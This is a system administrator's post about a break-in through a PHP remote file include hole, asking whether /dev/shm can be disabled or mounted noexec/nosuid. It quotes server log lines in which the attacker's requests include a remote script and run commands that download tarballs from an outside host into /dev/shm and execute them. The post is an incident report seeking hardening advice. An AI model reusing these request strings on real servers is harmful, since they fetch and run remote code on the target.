Hello, One of the server I'm co-administering just got attacked a few days ago. The cracker managed to start a shell on the server by using one of these php-nuke-like include holes laying in old php scripts. Until now it failed because most of these scripts were working with /tmp, and the /tmp on that server was mounted with noexec+nosuid. But this time /dev/shm was used: is this "new" filesysteme really necessary, and what for? Would you keep it, or rather shut it down completely? At least I'd like to have it also mounted in nosuid/noexec mode... I'll check in the boot scripts how to do that, but in the mean time if you have suggestion, you're welcome :) Webserver logs when the attack occured (the aleks-exploits pages still seems to be active: you can get some interesting files from there, like exploits against linux kernel, irc bots, and other "goodies"): 212.110.91.36 - - [30/Oct/2004:18:03:29 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol& chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm; wget%20www.aleks-exploits.com/amech.tgz;tar%20zxvf%20amech.tgz;cd% 20.amech;./sh HTTP/1.1" 200 3189 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 212.110.91.36 - - [30/Oct/2004:18:03:49 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol& chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm; wget%20www.aleks-exploits.com/a.tgz;tar%20zxvf%20a.tgz;./a HTTP/1.1" 200 2894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Regards, Olivier